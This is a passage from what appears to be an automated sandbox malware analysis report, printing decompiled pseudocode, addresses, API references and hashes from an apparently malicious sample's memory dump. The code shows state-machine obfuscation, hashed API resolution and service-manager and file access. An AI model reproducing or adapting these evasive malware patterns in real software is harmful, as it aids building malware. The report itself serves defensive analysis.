                                                        												 *0x3bde08 = _t52;
                                                        											}
                                                        											_t53 =  *_t52();
                                                        											_t104 = 0x128dff18;
                                                        											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
                                                        											_t16 = _t58 + _v52 * 0x2c;
                                                        											__eflags = _t103 - _t16;
                                                        											_v68 = _t16;
                                                        											_t101 =  >=  ? _t58 : _t103;
                                                        											continue;
                                                        										}
                                                        										L55:
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L54:
                                                        						return _t16;
                                                        						goto L55;
                                                        					}
                                                        					if(_t115 == 0) {
                                                        						_t29 =  *0x3be494;
                                                        						__eflags = _t29;
                                                        						if(_t29 == 0) {
                                                        							_t29 = E003B3E60(_t58, E003B3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        							 *0x3be494 = _t29;
                                                        						}
                                                        						_t107 =  *_t29();
                                                        						_t31 =  *0x3bdf30;
                                                        						__eflags = _t31;
                                                        						if(_t31 == 0) {
                                                        							_t31 = E003B3E60(_t58, E003B3F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        							 *0x3bdf30 = _t31;
                                                        						}
                                                        						return  *_t31(_t107, 0, _t58);
                                                        					}
                                                        					_t116 = _t104 - 0x10f7fbef;
                                                        					if(_t116 > 0) {
                                                        						__eflags = _t104 - 0x11e09e52;
                                                        						if(_t104 == 0x11e09e52) {
                                                        							_t35 =  *0x3be494;
                                                        							__eflags = _t35;
                                                        							if(_t35 == 0) {
                                                        								_t35 = E003B3E60(_t58, E003B3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        								 *0x3be494 = _t35;
                                                        							}
                                                        							_t108 =  *_t35();
                                                        							_t37 =  *0x3bdf30;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E003B3E60(_t58, E003B3F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        								 *0x3bdf30 = _t37;
                                                        							}
                                                        							 *_t37(_t108, 0, _t112);
                                                        							_t104 = 0x12f72f95;
                                                        							continue;
                                                        						} else {
                                                        							__eflags = _t104 - 0x128dff18;
                                                        							if(_t104 != 0x128dff18) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t41 =  *0x3be270;
                                                        								__eflags = _t41;
                                                        								if(_t41 == 0) {
                                                        									_t41 = E003B3E60(_t58, E003B3F00(0x26f5757c), 0x56e230f9, _t112);
                                                        									 *0x3be270 = _t41;
                                                        								}
                                                        								_t42 =  *_t41(_v20,  *_t101, 1);
                                                        								__eflags = _t42;
                                                        								_v36 = _t42;
                                                        								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
                                                        								while(1) {
                                                        									_t16 = _v28;
                                                        									goto L2;
                                                        								}
                                                        							}
                                                        						}
                                                        					} else {
                                                        						if(_t116 == 0) {
                                                        							_t45 =  *0x3be200;
                                                        							__eflags = _t45;
                                                        							if(_t45 == 0) {
                                                        								_t45 = E003B3E60(_t58, E003B3F00(0x26f5757c), 0x16d40839, _t112);
                                                        								 *0x3be200 = _t45;
                                                        							}
                                                        							 *_t45(_v16, 1, _t112);
                                                        							goto L13;
                                                        						} else {
                                                        							if(_t104 == 0x5d498c4) {
                                                        								_t101 = _t101 + 0x2c;
                                                        								__eflags = _t101 - _t16;
                                                        								asm("sbb esi, esi");
                                                        								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t104 != 0x8956eec) {
                                                        									goto L40;
                                                        								} else {
                                                        									_t112 = E003B42C0(_t58, 0x2000);
                                                        									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L54;
                                                        				}
                                                        			}









































                                                        0x003b5047
                                                        0x003b504b
                                                        0x003b504d
                                                        0x003b5051
                                                        0x003b5053
                                                        0x003b5057
                                                        0x003b505c
                                                        0x003b505c
                                                        0x003b5060
                                                        0x003b5060
                                                        0x003b5060
                                                        0x003b5066
                                                        0x00000000
                                                        0x00000000
                                                        0x003b51af
                                                        0x003b51b5
                                                        0x003b52f9
                                                        0x003b52ff
                                                        0x00000000
                                                        0x003b5301
                                                        0x003b5301
                                                        0x003b5306
                                                        0x003b5308
                                                        0x003b531b
                                                        0x003b5320
                                                        0x003b5320
                                                        0x003b5327
                                                        0x003b532e
                                                        0x003b5330
                                                        0x003b5348
                                                        0x003b5348
                                                        0x003b5355
                                                        0x003b5357
                                                        0x003b5359
                                                        0x003b535b
                                                        0x003b535d
                                                        0x003b505c
                                                        0x003b505c
                                                        0x00000000
                                                        0x003b505c
                                                        0x003b505c
                                                        0x003b535b
                                                        0x003b51bb
                                                        0x003b51bb
                                                        0x003b5277
                                                        0x003b527c
                                                        0x003b527e
                                                        0x003b5291
                                                        0x003b5296
                                                        0x003b5296
                                                        0x003b52ac
                                                        0x003b52b0
                                                        0x003b52b2
                                                        0x003b52bd
                                                        0x003b52c3
                                                        0x003b52c5
                                                        0x003b52d8
                                                        0x003b52dd
                                                        0x003b52dd
                                                        0x003b52e6
                                                        0x00000000
                                                        0x003b51c1
                                                        0x003b51c1
                                                        0x003b51c7
                                                        0x003b526d
                                                        0x00000000
                                                        0x003b51cd
                                                        0x003b51cd
                                                        0x003b51d3
                                                        0x003b52e8
                                                        0x003b52e8
                                                        0x003b52ee
                                                        0x003b505c
                                                        0x003b505c
                                                        0x00000000
                                                        0x003b505c
                                                        0x003b505c
                                                        0x003b51d9
                                                        0x003b51d9
                                                        0x003b51de
                                                        0x003b51e0
                                                        0x003b51f3
                                                        0x003b51f8
                                                        0x003b51f8
                                                        0x003b521b
                                                        0x003b521d
                                                        0x003b521f
                                                        0x003b50ef
                                                        0x003b50ef
                                                        0x003b505c
                                                        0x003b505c
                                                        0x00000000
                                                        0x003b505c
                                                        0x003b5225
                                                        0x003b5225
                                                        0x003b522a
                                                        0x003b522c
                                                        0x003b523f
                                                        0x003b5244
                                                        0x003b5244
                                                        0x003b5249
                                                        0x003b524e
                                                        0x003b525b
                                                        0x003b525d
                                                        0x003b525f
                                                        0x003b5261
                                                        0x003b5265
                                                        0x00000000
                                                        0x003b5265
                                                        0x00000000
                                                        0x003b521f
                                                        0x003b51d3
                                                        0x003b51c7
                                                        0x003b51bb
                                                        0x003b53c0
                                                        0x003b53c0
                                                        0x00000000
                                                        0x003b53c0
                                                        0x003b506c
                                                        0x003b5367
                                                        0x003b536c
                                                        0x003b536e
                                                        0x003b5381
                                                        0x003b5386
                                                        0x003b5386
                                                        0x003b538d
                                                        0x003b538f
                                                        0x003b5394
                                                        0x003b5396
                                                        0x003b53a9
                                                        0x003b53ae
                                                        0x003b53ae
                                                        0x00000000
                                                        0x003b53b7
                                                        0x003b5072
                                                        0x003b5078
                                                        0x003b50f9
                                                        0x003b50ff
                                                        0x003b5153
                                                        0x003b5158
                                                        0x003b515a
                                                        0x003b516d
                                                        0x003b5172
                                                        0x003b5172
                                                        0x003b5179
                                                        0x003b517b
                                                        0x003b5180
                                                        0x003b5182
                                                        0x003b5195
                                                        0x003b519a
                                                        0x003b519a
                                                        0x003b51a3
                                                        0x003b51a5
                                                        0x00000000
                                                        0x003b5101
                                                        0x003b5101
                                                        0x003b5107
                                                        0x00000000
                                                        0x003b510d
                                                        0x003b510d
                                                        0x003b5112
                                                        0x003b5114
                                                        0x003b5127
                                                        0x003b512c
                                                        0x003b512c
                                                        0x003b5139
                                                        0x003b513b
                                                        0x003b513d
                                                        0x003b514b
                                                        0x003b505c
                                                        0x003b505c
                                                        0x00000000
                                                        0x003b505c
                                                        0x003b505c
                                                        0x003b5107
                                                        0x003b507a
                                                        0x003b507a
                                                        0x003b50c2
                                                        0x003b50c7
                                                        0x003b50c9
                                                        0x003b50dc
                                                        0x003b50e1
                                                        0x003b50e1
                                                        0x003b50ed
                                                        0x00000000
                                                        0x003b507c
                                                        0x003b5082
                                                        0x003b50ad
                                                        0x003b50b0
                                                        0x003b50b2
                                                        0x003b50ba
                                                        0x00000000
                                                        0x003b5084
                                                        0x003b508a
                                                        0x00000000
                                                        0x003b5090
                                                        0x003b509a
                                                        0x003b50a8
                                                        0x003b505c
                                                        0x003b505c
                                                        0x00000000
                                                        0x003b505c
                                                        0x003b505c
                                                        0x003b508a
                                                        0x003b5082
                                                        0x003b507a
                                                        0x00000000
                                                        0x003b5078

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,003B8AC8,?,3251FEFE,?,?), ref: 003B5355
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, Offset: 003B0000, based on PE: true
                                                        • Associated: 00000009.00000002.2265816784.00000000003B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265828788.00000000003BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265833373.00000000003BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3b0000_wcnwiz.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 424f7604159fd02c26b1d7c2193f9825dddda75a8fa367d270737a35a6745ca9
                                                        • Instruction ID: 51124187f8eb12a1688765a10d0f62a9e0b9a417f7947d093d34cffa02530b5a
                                                        • Opcode Fuzzy Hash: 424f7604159fd02c26b1d7c2193f9825dddda75a8fa367d270737a35a6745ca9
                                                        • Instruction Fuzzy Hash: 6681F232B447204BDB16AF7D9C917EA36EEAB9474CF020929FB05DFA91EA30DD004781
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        C-Code - Quality: 73%
                                                        			E003B9860() {
                                                        				char _v524;
                                                        				unsigned int _v528;
                                                        				char _v536;
                                                        				void* _v544;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t28;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t37;
                                                        				void* _t39;
                                                        				void* _t40;
                                                        				void* _t47;
                                                        				void* _t49;
                                                        				void* _t50;
                                                        				void* _t53;
                                                        				void* _t56;
                                                        				intOrPtr* _t60;
                                                        				intOrPtr _t62;
                                                        				void* _t64;
                                                        				void* _t69;
                                                        				void* _t72;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				intOrPtr _t94;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        
                                                        				_t64 = 0;
                                                        				_t28 = 0x29f9e503;
                                                        				_t92 = _v528;
                                                        				_t2 = _t64 + 1; // 0x1
                                                        				_t94 = _t2;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t97 = _t28 - 0x13fee53b;
                                                        						if(_t97 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t97 == 0) {
                                                        							__eflags =  *0x3be310;
                                                        							if( *0x3be310 == 0) {
                                                        								 *0x3be310 = E003B3E60(_t64, E003B3F00(0x26f5757c), 0x9ba7cd1, _t94);
                                                        							}
                                                        							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                        							_t92 = _t49;
                                                        							__eflags = _t92;
                                                        							if(_t92 == 0) {
                                                        								_t28 = 0x23c48583;
                                                        							} else {
                                                        								_t50 =  *0x3be54c; // 0x51e730
                                                        								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
                                                        								_t28 = 0xc471eb;
                                                        							}
                                                        							continue;
                                                        						} else {
                                                        							_t98 = _t28 - 0x9835f84;
                                                        							if(_t98 > 0) {
                                                        								__eflags = _t28 - 0xc0f0991;
                                                        								if(_t28 != 0xc0f0991) {
                                                        									goto L36;
                                                        								} else {
                                                        									_t69 =  *0x3bdbd8;
                                                        									__eflags = _t69;
                                                        									if(_t69 == 0) {
                                                        										_t69 = E003B3E60(_t64, E003B3F00(0xd9518805), 0x141622d6, _t94);
                                                        										 *0x3bdbd8 = _t69;
                                                        									}
                                                        									_t53 =  *0x3be54c; // 0x51e730
                                                        									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
                                                        									__eflags = _t56;
                                                        									_t28 = 0x9835f84;
                                                        									_t64 =  ==  ? _t94 : _t64;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t98 == 0) {
                                                        									E003B7C60(_t94);
                                                        									_t28 = 0x6addd5c;
                                                        									continue;
                                                        								} else {
                                                        									if(_t28 == 0xc471eb) {
                                                        										_v528 = 0xc1a3;
                                                        										_t28 = 0x179ed98e;
                                                        										_v528 = _v528 + 0xffff1ad7;
                                                        										_v528 = _v528 ^ 0xffffdc53;
                                                        										continue;
                                                        									} else {
                                                        										if(_t28 != 0x6addd5c) {
                                                        											goto L36;
                                                        										} else {
                                                        											_t60 =  *0x3be3f4;
                                                        											if(_t60 == 0) {
                                                        												_t60 = E003B3E60(_t64, E003B3F00(0x9bab0b12), 0x7dc9b9bb, _t94);
                                                        												 *0x3be3f4 = _t60;
                                                        											}
                                                        											 *_t60(0,  &_v524, 0x104);
                                                        											_t62 = E003B3D00( &_v536);
                                                        											_t72 =  *0x3be54c; // 0x51e730
                                                        											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
                                                        											_t28 = 0x39ea8110;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L42:
                                                        					}
                                                        					__eflags = _t28 - 0x29f9e503;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t28 - 0x39ea8110;
                                                        						if(_t28 == 0x39ea8110) {
                                                        							_t29 =  *0x3bdbd8;
                                                        							__eflags = _t29;
                                                        							if(_t29 == 0) {
                                                        								_t29 = E003B3E60(_t64, E003B3F00(0xd9518805), 0x141622d6, _t94);
                                                        								 *0x3bdbd8 = _t29;
                                                        							}
                                                        							 *_t29(0, 0x25, 0, 0,  &_v524);
                                                        							_t31 =  *0x3be54c; // 0x51e730
                                                        							_t32 = _t31 + 0x234;
                                                        							__eflags = _t31 + 0x234;
                                                        							E003B3040(_t32);
                                                        							goto L41;
                                                        						} else {
                                                        							goto L36;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							_t37 =  *0x3be494;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E003B3E60(_t64, E003B3F00(0x9bab0b12), 0x7facde30, _t94);
                                                        								 *0x3be494 = _t37;
                                                        							}
                                                        							_t93 =  *_t37();
                                                        							_t39 =  *0x3bdd18;
                                                        							__eflags = _t39;
                                                        							if(_t39 == 0) {
                                                        								_t39 = E003B3E60(_t64, E003B3F00(0x9bab0b12), 0x9ff0609c, _t94);
                                                        								 *0x3bdd18 = _t39;
                                                        							}
                                                        							_t40 =  *_t39(_t93, 8, 0x480);
                                                        							 *0x3be54c = _t40;
                                                        							__eflags = _t40;
                                                        							if(_t40 == 0) {
                                                        								L41:
                                                        								return _t64;
                                                        							} else {
                                                        								 *((intOrPtr*)(_t40 + 4)) = E003B7E40;
                                                        								_t28 = 0x13fee53b;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							__eflags = _t28 - 0x179ed98e;
                                                        							if(_t28 == 0x179ed98e) {
                                                        								__eflags =  *0x3be18c;
                                                        								if( *0x3be18c == 0) {
                                                        									 *0x3be18c = E003B3E60(_t64, E003B3F00(0x26f5757c), 0x268fe5f0, _t94);
                                                        								}
                                                        								CloseServiceHandle(_t92); // executed
                                                        								_t28 = 0xc0f0991;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t28 - 0x23c48583;
                                                        								if(_t28 != 0x23c48583) {
                                                        									goto L36;
                                                        								} else {
                                                        									_v528 = 0x5332;
                                                        									_v528 = _v528 << 6;
                                                        									_v528 = _v528 >> 0xf;
                                                        									_v528 = _v528 + 0xffffb18f;
                                                        									_v528 = _v528 >> 3;
                                                        									_v528 = _v528 ^ 0x1ffff62b;
                                                        									_t47 =  *0x3be54c; // 0x51e730
                                                        									 *((intOrPtr*)(_t47 + 8)) = 0x3b7e30;
                                                        									_t28 = 0xc0f0991;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L42;
                                                        					L36:
                                                        					__eflags = _t28 - 0x305b3459;
                                                        				} while (_t28 != 0x305b3459);
                                                        				return _t64;
                                                        				goto L42;
                                                        			}






























                                                        0x003b9868
                                                        0x003b986a
                                                        0x003b9871
                                                        0x003b9875
                                                        0x003b9875
                                                        0x003b9878
                                                        0x003b9880
                                                        0x003b9880
                                                        0x003b9880
                                                        0x003b9880
                                                        0x003b9885
                                                        0x00000000
                                                        0x00000000
                                                        0x003b988b
                                                        0x003b9993
                                                        0x003b9995
                                                        0x003b99ad
                                                        0x003b99ad
                                                        0x003b99bb
                                                        0x003b99bd
                                                        0x003b99bf
                                                        0x003b99c1
                                                        0x003b99d8
                                                        0x003b99c3
                                                        0x003b99c3
                                                        0x003b99c8
                                                        0x003b99ce
                                                        0x003b99ce
                                                        0x00000000
                                                        0x003b9891
                                                        0x003b9891
                                                        0x003b9896
                                                        0x003b9936
                                                        0x003b993b
                                                        0x00000000
                                                        0x003b9941
                                                        0x003b9941
                                                        0x003b9947
                                                        0x003b9949
                                                        0x003b9961
                                                        0x003b9963
                                                        0x003b9963
                                                        0x003b9969
                                                        0x003b997d
                                                        0x003b997f
                                                        0x003b9981
                                                        0x003b9986
                                                        0x00000000
                                                        0x003b9986
                                                        0x003b989c
                                                        0x003b989c
                                                        0x003b9927
                                                        0x003b992c
                                                        0x00000000
                                                        0x003b98a2
                                                        0x003b98a7
                                                        0x003b9905
                                                        0x003b990d
                                                        0x003b9912
                                                        0x003b991a
                                                        0x00000000
                                                        0x003b98a9
                                                        0x003b98ae
                                                        0x00000000
                                                        0x003b98b4
                                                        0x003b98b4
                                                        0x003b98bb
                                                        0x003b98ce
                                                        0x003b98d3
                                                        0x003b98d3
                                                        0x003b98e4
                                                        0x003b98ea
                                                        0x003b98ef
                                                        0x003b98f5
                                                        0x003b98fb
                                                        0x00000000
                                                        0x003b98fb
                                                        0x003b98ae
                                                        0x003b98a7
                                                        0x003b989c
                                                        0x003b9896
                                                        0x00000000
                                                        0x003b988b
                                                        0x003b99e2
                                                        0x003b99e7
                                                        0x003b9ae3
                                                        0x003b9ae8
                                                        0x003b9b02
                                                        0x003b9b07
                                                        0x003b9b09
                                                        0x003b9b1c
                                                        0x003b9b21
                                                        0x003b9b21
                                                        0x003b9b33
                                                        0x003b9b35
                                                        0x003b9b3e
                                                        0x003b9b3e
                                                        0x003b9b44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003b99ed
                                                        0x003b99ed
                                                        0x003b9a73
                                                        0x003b9a78
                                                        0x003b9a7a
                                                        0x003b9a8d
                                                        0x003b9a92
                                                        0x003b9a92
                                                        0x003b9a99
                                                        0x003b9a9b
                                                        0x003b9aa0
                                                        0x003b9aa2
                                                        0x003b9ab5
                                                        0x003b9aba
                                                        0x003b9aba
                                                        0x003b9ac7
                                                        0x003b9ac9
                                                        0x003b9ace
                                                        0x003b9ad0
                                                        0x003b9b4f
                                                        0x003b9b58
                                                        0x003b9ad2
                                                        0x003b9ad2
                                                        0x003b9ad9
                                                        0x00000000
                                                        0x003b9ad9
                                                        0x003b99f3
                                                        0x003b99f3
                                                        0x003b99f8
                                                        0x003b9a47
                                                        0x003b9a49
                                                        0x003b9a61
                                                        0x003b9a61
                                                        0x003b9a67
                                                        0x003b9a69
                                                        0x00000000
                                                        0x003b99fa
                                                        0x003b99fa
                                                        0x003b99ff
                                                        0x00000000
                                                        0x003b9a05
                                                        0x003b9a05
                                                        0x003b9a0d
                                                        0x003b9a12
                                                        0x003b9a17
                                                        0x003b9a1f
                                                        0x003b9a24
                                                        0x003b9a2c
                                                        0x003b9a31
                                                        0x003b9a38
                                                        0x00000000
                                                        0x003b9a38
                                                        0x003b99ff
                                                        0x003b99f8
                                                        0x003b99ed
                                                        0x00000000
                                                        0x003b9aea
                                                        0x003b9aea
                                                        0x003b9aea
                                                        0x003b9b01
                                                        0x00000000

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,0051E718), ref: 003B997D
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 003B99BB
                                                        • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 003B9A67
                                                        • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 003B9B33
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, Offset: 003B0000, based on PE: true
                                                        • Associated: 00000009.00000002.2265816784.00000000003B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265828788.00000000003BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265833373.00000000003BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3b0000_wcnwiz.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPath$CloseHandleManagerOpenService
                                                        • String ID: 0Q$2S$Y4[0
                                                        • API String ID: 2382770032-4130634448
                                                        • Opcode ID: b2d10818b001e94896691272abc30f59e66d75cfecb9a2a261bc83a0b929738b
                                                        • Instruction ID: cd32540b057ed8e8c135d172312e0ca193b8dfe06191f9b02d1a046df16d9177
                                                        • Opcode Fuzzy Hash: b2d10818b001e94896691272abc30f59e66d75cfecb9a2a261bc83a0b929738b
                                                        • Instruction Fuzzy Hash: BA61C331B042055BDB2AAF6CAC957EA3399DB9170CF11042FF305DFA91EA30DD058792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 105 3b8400-3b84df 106 3b84e3-3b84e9 105->106 107 3b85c8-3b85ce 106->107 108 3b84ef 106->108 109 3b8630-3b8637 107->109 110 3b85d0-3b85d6 107->110 111 3b866c-3b86b4 call 3bb6e0 108->111 112 3b84f5-3b84fb 108->112 113 3b8639-3b864f call 3b3f00 call 3b3e60 109->113 114 3b8654-3b8667 109->114 115 3b85d8-3b85e0 110->115 116 3b85b1-3b85b7 110->116 122 3b85bd-3b85c7 111->122 129 3b86ba 111->129 117 3b854a-3b8551 112->117 118 3b84fd-3b8503 112->118 113->114 114->106 125 3b85e2-3b85fa call 3b3f00 call 3b3e60 115->125 126 3b8600-3b8624 CreateFileW 115->126 116->106 116->122 123 3b856e-3b8591 117->123 124 3b8553-3b8569 call 3b3f00 call 3b3e60 117->124 127 3b8543-3b8548 118->127 128 3b8505-3b850b 118->128 146 3b85ae 123->146 147 3b8593-3b85a9 call 3b3f00 call 3b3e60 123->147 124->123 125->126 126->122 130 3b8626-3b862b 126->130 127->106 128->116 135 3b8511-3b8518 128->135 140 3b86bc-3b86be 129->140 141 3b86c4-3b86d1 129->141 130->106 137 3b851a-3b8530 call 3b3f00 call 3b3e60 135->137 138 3b8535-3b8541 135->138 137->138 138->106 140->122 140->141 146->116 147->146
                                                        C-Code - Quality: 66%
                                                        			E003B8400(void* __ebx, void* __ebp) {
                                                        				short _v524;
                                                        				char _v564;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				signed int _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				intOrPtr _v596;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t92;
                                                        				intOrPtr* _t93;
                                                        				void* _t95;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        				void* _t99;
                                                        				void* _t100;
                                                        				void* _t101;
                                                        				signed int _t119;
                                                        				void* _t121;
                                                        				void* _t122;
                                                        				signed int _t123;
                                                        				intOrPtr _t124;
                                                        				void* _t126;
                                                        				void* _t129;
                                                        
                                                        				_t126 = __ebp;
                                                        				_t101 = __ebx;
                                                        				_v584 = 0xdbec;
                                                        				_v584 = _v584 + 0xa437;
                                                        				_v584 = _v584 | 0x0afcf5fb;
                                                        				_v584 = _v584 ^ 0x9493ba05;
                                                        				_v584 = _v584 >> 0xc;
                                                        				_v584 = _v584 >> 0xb;
                                                        				_v584 = _v584 ^ 0x000001bc;
                                                        				_v592 = 0x7d19;
                                                        				_v592 = _v592 << 9;
                                                        				_v592 = _v592 >> 0xe;
                                                        				_v592 = _v592 + 0xffff07e5;
                                                        				_v592 = _v592 | 0x8aea6eef;
                                                        				_v592 = _v592 + 0xd867;
                                                        				_v592 = _v592 + 0x9c41;
                                                        				_v592 = _v592 + 0x3de0;
                                                        				_v592 = _v592 + 0x218b;
                                                        				_v592 = _v592 ^ 0x00014403;
                                                        				_v588 = 0x2591;
                                                        				_t123 = 0x4a20241;
                                                        				_v588 = _v588 * 0x7d;
                                                        				_v588 = _v588 + 0x8d68;
                                                        				_v588 = _v588 + 0xffff8911;
                                                        				_v588 = _v588 * 0x6a;
                                                        				_v588 = _v588 + 0xffff93d5;
                                                        				_v588 = _v588 ^ 0x07a13cd2;
                                                        				_v580 = 0x789;
                                                        				_v580 = _v580 >> 1;
                                                        				_v580 = _v580 ^ 0xaee58af2;
                                                        				_v580 = _v580 ^ 0xaee58936;
                                                        				_t122 = _v580;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t129 = _t123 - 0x1aed34c4;
                                                        						if(_t129 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t129 == 0) {
                                                        							_v580 = 0xa8c00;
                                                        							_v576 = 0;
                                                        							_v596 = E003BB6E0(_v580, _v576, 0x989680, 0);
                                                        							_v592 = _t119;
                                                        							_t121 = _v588 - _v564;
                                                        							_t124 = _v596;
                                                        							asm("sbb ecx, [esp+0x3c]");
                                                        							__eflags = _v584 - _v592;
                                                        							if(__eflags < 0) {
                                                        								goto L16;
                                                        							} else {
                                                        								if(__eflags > 0) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									__eflags = _t121 - _t124;
                                                        									if(_t121 < _t124) {
                                                        										goto L16;
                                                        									} else {
                                                        										goto L29;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(_t123 == 0x12f5064) {
                                                        								_t82 =  *0x3bdec0;
                                                        								__eflags = _t82;
                                                        								if(_t82 == 0) {
                                                        									_t99 = E003B3F00(0x9bab0b12);
                                                        									_t119 = 0x8b0c7279;
                                                        									_t82 = E003B3E60(_t101, _t99, 0x8b0c7279, _t126);
                                                        									 *0x3bdec0 = _t82;
                                                        								}
                                                        								 *_t82(_t122, 0,  &_v564, 0x28);
                                                        								asm("sbb esi, esi");
                                                        								_t85 =  *0x3bde3c;
                                                        								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
                                                        								__eflags = _t85;
                                                        								if(_t85 == 0) {
                                                        									_t98 = E003B3F00(0x9bab0b12);
                                                        									_t119 = 0x20de7595;
                                                        									_t85 = E003B3E60(_t101, _t98, 0x20de7595, _t126);
                                                        									 *0x3bde3c = _t85;
                                                        								}
                                                        								 *_t85(_t122);
                                                        								goto L15;
                                                        							} else {
                                                        								if(_t123 == 0x4a20241) {
                                                        									_t123 = 0x33602029;
                                                        									continue;
                                                        								} else {
                                                        									if(_t123 != 0xd59c266) {
                                                        										goto L15;
                                                        									} else {
                                                        										_t93 =  *0x3be1d4;
                                                        										if(_t93 == 0) {
                                                        											_t97 = E003B3F00(0x9bab0b12);
                                                        											_t119 = 0xa229df38;
                                                        											_t93 = E003B3E60(_t101, _t97, 0xa229df38, _t126);
                                                        											 *0x3be1d4 = _t93;
                                                        										}
                                                        										 *_t93( &_v572);
                                                        										_t123 = 0x1aed34c4;
                                                        										continue;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t123 - 0x33602029;
                                                        					if(_t123 == 0x33602029) {
                                                        						_t75 =  *0x3be3f4;
                                                        						__eflags = _t75;
                                                        						if(_t75 == 0) {
                                                        							_t100 = E003B3F00(0x9bab0b12);
                                                        							_t119 = 0x7dc9b9bb;
                                                        							_t75 = E003B3E60(_t101, _t100, 0x7dc9b9bb, _t126);
                                                        							 *0x3be3f4 = _t75;
                                                        						}
                                                        						 *_t75(0,  &_v524, 0x104);
                                                        						_t123 = 0x3ae77736;
                                                        						goto L1;
                                                        					} else {
                                                        						__eflags = _t123 - 0x3ae77736;
                                                        						if(_t123 != 0x3ae77736) {
                                                        							goto L15;
                                                        						} else {
                                                        							__eflags =  *0x3bde04;
                                                        							if( *0x3bde04 == 0) {
                                                        								_t95 = E003B3F00(0x9bab0b12);
                                                        								_t119 = 0xb66d748a;
                                                        								 *0x3bde04 = E003B3E60(_t101, _t95, 0xb66d748a, _t126);
                                                        							}
                                                        							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
                                                        							_t122 = _t92;
                                                        							__eflags = _t122 - 0xffffffff;
                                                        							if(_t122 == 0xffffffff) {
                                                        								break;
                                                        							} else {
                                                        								_t123 = 0x12f5064;
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L15:
                                                        					__eflags = _t123 - 0x13ef6fdf;
                                                        				} while (_t123 != 0x13ef6fdf);
                                                        				L16:
                                                        				__eflags = 0;
                                                        				return 0;
                                                        				goto L30;
                                                        			}






























                                                        0x003b8400
                                                        0x003b8400
                                                        0x003b8406
                                                        0x003b840e
                                                        0x003b8416
                                                        0x003b841e
                                                        0x003b8426
                                                        0x003b842b
